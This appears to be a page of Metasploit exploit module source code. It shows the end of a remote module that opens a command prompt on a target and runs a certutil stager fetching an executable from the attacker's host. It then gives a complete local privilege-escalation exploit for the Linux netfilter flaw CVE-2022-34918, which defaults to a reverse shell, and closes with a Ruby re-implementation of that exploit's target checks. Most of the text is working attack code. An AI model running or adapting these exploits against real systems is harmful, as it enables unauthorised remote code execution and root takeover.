end<br /><br /> def check<br /> if datastore['CLIENTNAME'].blank?<br /> @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s<br /> print_status("Client name set to: #{@client_name}")<br /> else<br /> @client_name = datastore['CLIENTNAME']<br /> end<br /><br /> connect<br /><br /> print_status('Connecting')<br /> connect_command<br /> res = sock.get_once<br /> if res.nil?<br /> return CheckCode::Unknown('No response received from target')<br /> end<br /><br /> disconnect<br /><br /> res = res.split("\x1E")<br /> if res[1] == 'NO'<br /> return CheckCode::Safe("Unable to connect, server response: #{res[4]}")<br /> end<br /><br /> CheckCode::Appears("Connected to hostname #{res[3]} with MAC address #{res[5]}")<br /> end<br /><br /> def exploit<br /> if datastore['CLIENTNAME'].blank?<br /> @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s<br /> print_status("Client name set to: #{@client_name}")<br /> else<br /> @client_name = datastore['CLIENTNAME']<br /> end<br /><br /> connect<br /><br /> print_status('Connecting')<br /> connect_command<br /> res = sock.get_once<br /> if res.nil?<br /> fail_with(Failure::Disconnected, 'No response received from target')<br /> end<br /><br /> res = res.split("\x1E")<br /> if res[1] == 'NO'<br /> fail_with(Failure::NoAccess, "Unable to connect, server response: #{res[4]}")<br /> end<br /> vprint_good("Connected to hostname #{res[3]} with MAC address #{res[5]}")<br /><br /> print_status('Opening Command Prompt')<br /> open_command_prompt<br /> # for whatever reason, if we don't read here the server doesn't want to keep playing with us, so read but throw away<br /> sock.get_once<br /><br /> print_status('Sending stager')<br /> filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'<br /> register_file_for_cleanup("#{path}#(unknown)")<br /> # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2<br /> stager = "certutil.exe -urlcache -f 
http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#(unknown)"<br /> start_service('Path' => '/') # start webserver<br /> script_content(stager)<br /><br /> print_status('Opening Command Prompt again')<br /> open_command_prompt<br /> print_status('Executing payload')<br /> script_content("#{path}#(unknown) && exit")<br /><br /> handler<br /> disconnect<br /> sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert<br /> end<br />end<br /></code></pre>
<pre><code># frozen_string_literal: true<br />
<br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Local<br />
  Rank = GreatRanking<br />
  include Msf::Post::Common<br />
  include Msf::Post::Linux::Priv<br />
  include Msf::Post::Linux::System<br />
  include Msf::Post::Linux::Kernel<br />
  include Msf::Post::Linux::Compile<br />
  include Msf::Post::File<br />
  include Msf::Exploit::EXE<br />
  include Msf::Exploit::FileDropper<br />
  prepend Msf::Exploit::Remote::AutoCheck<br />
<br />
  def initialize(info = {})<br />
    super(<br />
      update_info(<br />
        info,<br />
        'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation',<br />
        'Description' => %q{<br />
          An issue was discovered in the Linux kernel through 5.18.9.<br />
          A type confusion bug in nft_set_elem_init (leading to a buffer overflow)<br />
          could be used by a local attacker to escalate privileges.<br />
          The attacker can obtain root access, but must start with an unprivileged<br />
          user namespace to obtain CAP_NET_ADMIN access.<br />
          The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.<br />
        },<br />
        'License' => MSF_LICENSE,<br />
        'Author' => [<br />
          'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC<br />
          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates<br />
        ],<br />
        'DisclosureDate' => '2022-02-07',<br />
        'Platform' => 'linux',<br />
        'Arch' => [ARCH_X64],<br />
        'SessionTypes' => %w[meterpreter shell],<br />
        'DefaultOptions' => {<br />
          'Payload' => 'linux/x64/shell_reverse_tcp',<br />
          'PrependSetresuid' => true,<br />
          'PrependSetresgid' => true,<br />
          'PrependFork' => true,<br />
          'WfsDelay' => 30<br />
        },<br />
        'Targets' => [['Auto', {}]],<br />
        'DefaultTarget' => 0,<br />
        'Notes' => {<br />
          'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes.<br />
          'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted.<br />
          'SideEffects' => [ARTIFACTS_ON_DISK]<br />
        },<br />
        'References' => [<br />
          ['CVE', '2022-34918'],<br />
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'],<br />
          ['URL', 'https://ubuntu.com/security/CVE-2022-34918'],<br />
          ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'],<br />
          ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC']<br />
        ]<br />
      )<br />
    )<br />
<br />
    register_options(<br />
      [<br />
        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),<br />
        OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5])<br />
      ]<br />
    )<br />
<br />
    register_advanced_options(<br />
      [<br />
        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp'])<br />
      ]<br />
    )<br />
  end<br />
<br />
  def base_dir<br />
    datastore['WritableDir']<br />
  end<br />
<br />
  # Drop the pre-built ubuntu.elf shipped with the framework (used when COMPILE is False,<br />
  # or when COMPILE is Auto and make is not available on the target).<br />
  def upload_exploit_binary<br />
    @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))<br />
    upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf'))<br />
    register_file_for_cleanup(@executable_path)<br />
  end<br />
<br />
  def upload_payload_binary<br />
    @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))<br />
    upload_and_chmodx(@payload_path, generate_payload_exe)<br />
    register_file_for_cleanup(@payload_path)<br />
  end<br />
<br />
  # Walk external/source/exploits/CVE-2022-34918 on the attacker side and mirror it into a<br />
  # randomly named directory under WritableDir, so it can be built with make on the target.<br />
  def upload_source<br />
    @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))<br />
    mkdir(@exploit_source_path)<br />
    register_dir_for_cleanup(@exploit_source_path)<br />
    dirs = [ '.' ]<br />
    until dirs.empty?<br />
      current_dir = dirs.pop<br />
      dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir)<br />
      Dir.entries(dir_full_path).each do |ent|<br />
        next if ent == '.' || ent == '..'<br />
<br />
        full_path_host = ::File.join(dir_full_path, ent)<br />
        relative_path = ::File.join(current_dir, ent)<br />
        full_path_target = ::File.join(@exploit_source_path, current_dir, ent)<br />
        if File.file?(full_path_host)<br />
          vprint_status("Uploading #{relative_path} to #{full_path_target}")<br />
          upload_file(full_path_target, full_path_host)<br />
        elsif File.directory?(full_path_host)<br />
          vprint_status("Creating the directory #{full_path_target}")<br />
          mkdir(full_path_target)<br />
          dirs.push(relative_path)<br />
        else<br />
          print_error("#{full_path_host} doesn't look like a file or a directory")<br />
        end<br />
      end<br />
    end<br />
  end<br />
<br />
  def compile_source<br />
    fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make')<br />
    info = cmd_exec("make -C #{@exploit_source_path}")<br />
    vprint_status(info)<br />
    @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf')<br />
    if exists?(@executable_path)<br />
      chmod(@executable_path, 0o700) unless executable?(@executable_path)<br />
      print_good('Compilation was successful')<br />
    else<br />
      fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)')<br />
    end<br />
  end<br />
<br />
  # The exploit is probabilistic: run it up to MAX_TRIES times and stop as soon as a session comes back.<br />
  def run_payload<br />
    success = false<br />
    1.upto(datastore['MAX_TRIES']) do |i|<br />
      vprint_status "Execution attempt ##{i}"<br />
      info = cmd_exec(@executable_path, @payload_path)<br />
      info.each_line do |line|<br />
        vprint_status(line.chomp)<br />
      end<br />
      if session_created?<br />
        success = true<br />
        break<br />
      end<br />
      sleep 3<br />
    end<br />
    if success<br />
      print_good('A session has been created')<br />
    else<br />
      print_bad('Exploit has failed')<br />
    end<br />
  end<br />
<br />
  def get_external_source_code(cve, file)<br />
    file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")<br />
    ::File.binread(file_path)<br />
  end<br />
<br />
  # Pre-flight checks (skipped with ForceExploit): the offsets table in src/util.c must contain<br />
  # this exact kernel build ("uname -r" plus the first token of "uname -v"), the work directories<br />
  # must be writable, and the session must not already be root.<br />
  def module_check<br />
    release = kernel_release<br />
    version = "#{release} #{kernel_version.split(' ').first}"<br />
    ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first<br />
    # ubuntu_offsets is nil when the kernels[] initializer is not found; to_s keeps that case on the<br />
    # "error parsing" path below instead of raising NoMethodError on nil.<br />
    ubuntu_kernels = ubuntu_offsets.to_s.scan(/"(.+?)"/).flatten<br />
    if ubuntu_kernels.empty?<br />
      fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.')<br />
    end<br />
    fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version)<br />
<br />
    fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir)<br />
    fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp')<br />
<br />
    if is_root?<br />
      fail_with(Failure::BadConfig, 'Session already has root privileges.')<br />
    end<br />
  end<br />
<br />
  # Passive check: every exploitation prerequisite must hold (CONFIG_USER_NS, unprivileged user<br />
  # namespaces allowed, no LKRG, x86_64) and the release must fall in the 5.7 to 5.19 window.<br />
  # Whether offsets exist for the build is only verified by module_check.<br />
  def check<br />
    config = kernel_config<br />
<br />
    return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?<br />
<br />
    return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')<br />
<br />
    return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?<br />
<br />
    return CheckCode::Safe('LKRG is installed') if lkrg_installed?<br />
<br />
    arch = kernel_hardware<br />
<br />
    return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')<br />
<br />
    release = kernel_release<br />
<br />
    version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures<br />
    if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i)<br />
      return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version")<br />
    end<br />
<br />
    CheckCode::Safe<br />
  end<br />
<br />
  def exploit<br />
    module_check unless datastore['ForceExploit']<br />
<br />
    if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make'))<br />
      print_status('Uploading the exploit source code')<br />
      upload_source<br />
      print_status('Compiling the exploit source code')<br />
      compile_source<br />
    else<br />
      print_status('Dropping pre-compiled binaries to system...')<br />
      upload_exploit_binary<br />
    end<br />
    print_status('Uploading payload...')<br />
    upload_payload_binary<br />
    print_status('Running payload on remote system...')<br />
    run_payload<br />
  end<br />
end<br />
</code></pre>
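The module makes two decisions before it touches the target: the passive check (kernel config, unprivileged user namespaces, LKRG, architecture, 5.7 to 5.19 release window) and the offsets lookup in src/util.c, which only succeeds when the exact Ubuntu build string is present. The following is an added example, not code from the Metasploit module or from the Randorisec PoC, that re-implements both decisions in plain Ruby with the host facts passed in as arguments, so they can be exercised offline or reused from a triage script. The util.c fragment, its kernel strings and all helper names are constructed for this example; strip_c_comments is a stand-in for the module's strip_comments helper, and the test data shows why that step is needed: a comment containing a quoted string would otherwise be read as a supported kernel.

```ruby
# Added example: stand-alone re-implementation of the module's target
# selection. Helper names, the util.c fragment and its kernel strings are
# this example's own assumptions, not code from the module or the PoC.

# Drop C block and line comments. Naive (a "//" inside a string literal is
# also eaten) but sufficient for an offsets table; without this step a
# comment such as  // see "offsets.md"  would be scanned as a kernel entry.
def strip_c_comments(src)
  src.gsub(%r{/\*.*?\*/}m, '').gsub(%r{//[^\n]*}, '')
end

# Quoted identifiers inside the `kernels[] = { ... };` initializer, using
# the same two regexes the module applies to src/util.c.
def supported_kernels(util_c)
  body = strip_c_comments(util_c).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
  return [] if body.nil?

  body.scan(/"(.+?)"/).flatten
end

# The module keys offsets on `uname -r` plus the first token of `uname -v`,
# e.g. "5.15.0-27-generic #28-Ubuntu".
def target_key(kernel_release, kernel_version)
  "#{kernel_release} #{kernel_version.split(' ').first}"
end

# Same order as the module's check method. Returns :unknown, :safe or
# :appears; :appears does not imply that offsets exist for the build.
def check_target(config:, userns_enabled:, lkrg_installed:, arch:, release:)
  return :unknown if config.nil?
  return :safe unless config.include?('CONFIG_USER_NS=y')
  return :safe unless userns_enabled
  return :safe if lkrg_installed
  return :safe unless arch.include?('x86_64')

  major, minor = release.match(/^(\d+)\.(\d+)/)&.captures
  return :appears if major&.to_i == 5 && minor && (7..19).cover?(minor.to_i)

  :safe
end

# Constructed util.c fragment in the shape the module parses. The kernel
# strings and the trailing comment are made up for this example.
SAMPLE_UTIL_C = <<~C
  const char *kernels[] = {
      "5.15.0-27-generic #28-Ubuntu",          // jammy, see "offsets.md"
      "5.13.0-37-generic #42~20.04.1-Ubuntu",
  };
C

if $PROGRAM_NAME == __FILE__
  # Constructed host facts standing in for kernel_config / uname output.
  release = '5.15.0-27-generic'
  version = '#28-Ubuntu SMP Thu Mar 17 11:20:42 UTC 2022'
  verdict = check_target(config: "CONFIG_USER_NS=y\n", userns_enabled: true,
                         lkrg_installed: false, arch: 'x86_64', release: release)
  key = target_key(release, version)
  puts "check: #{verdict}; offsets for '#{key}': #{supported_kernels(SAMPLE_UTIL_C).include?(key)}"
end
```

On a live host the same functions take `uname -r`, `uname -v`, the decompressed /proc/config.gz and the userns sysctl state; the point of keeping them pure is that a build string which differs by one token (a different `#NN-Ubuntu` ABI number, for instance) is reported as "no offsets" rather than attempted, which matters for a module whose failed attempts can leave the kernel in a state that needs a reboot.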